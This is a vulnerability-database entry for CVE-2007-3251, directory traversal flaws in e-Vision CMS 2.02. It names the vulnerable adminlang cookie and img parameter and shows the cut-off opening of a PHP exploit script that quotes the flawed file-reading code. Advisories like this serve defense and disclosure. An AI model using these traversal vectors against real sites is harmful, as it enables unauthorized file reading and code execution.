7.8
CVSSv2

CVE-2007-3251

Published: 18/06/2007 Updated: 19/10/2017
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:C/I:N/A:N

Vulnerability Summary

Multiple directory traversal vulnerabilities in e-Vision CMS 2.02 and previous versions allow remote malicious users to (1) include and execute arbitrary local files via a .. (dot dot) in the adminlang cookie to admin/functions.php or (2) read arbitrary local files via the img parameter to admin/show_img.php.

Vulnerable Product Search on Vulmon Subscribe to Product

e-vision e-vision cms

Exploits

#!/usr/bin/php -q -d short_open_tag=on <?php /* Explanation: Bug #1 (admin/show_imgphp): ################# # # <?php # # $fp = fopen($_GET['img'], "r"); # $img = fread($fp, filesize($_GET['img'])); # fclose($fp); # # header("Content-type: "$_GET['type']); # echo $img; # # ?> # ################# need i say more? Bug #2 (admin/f ...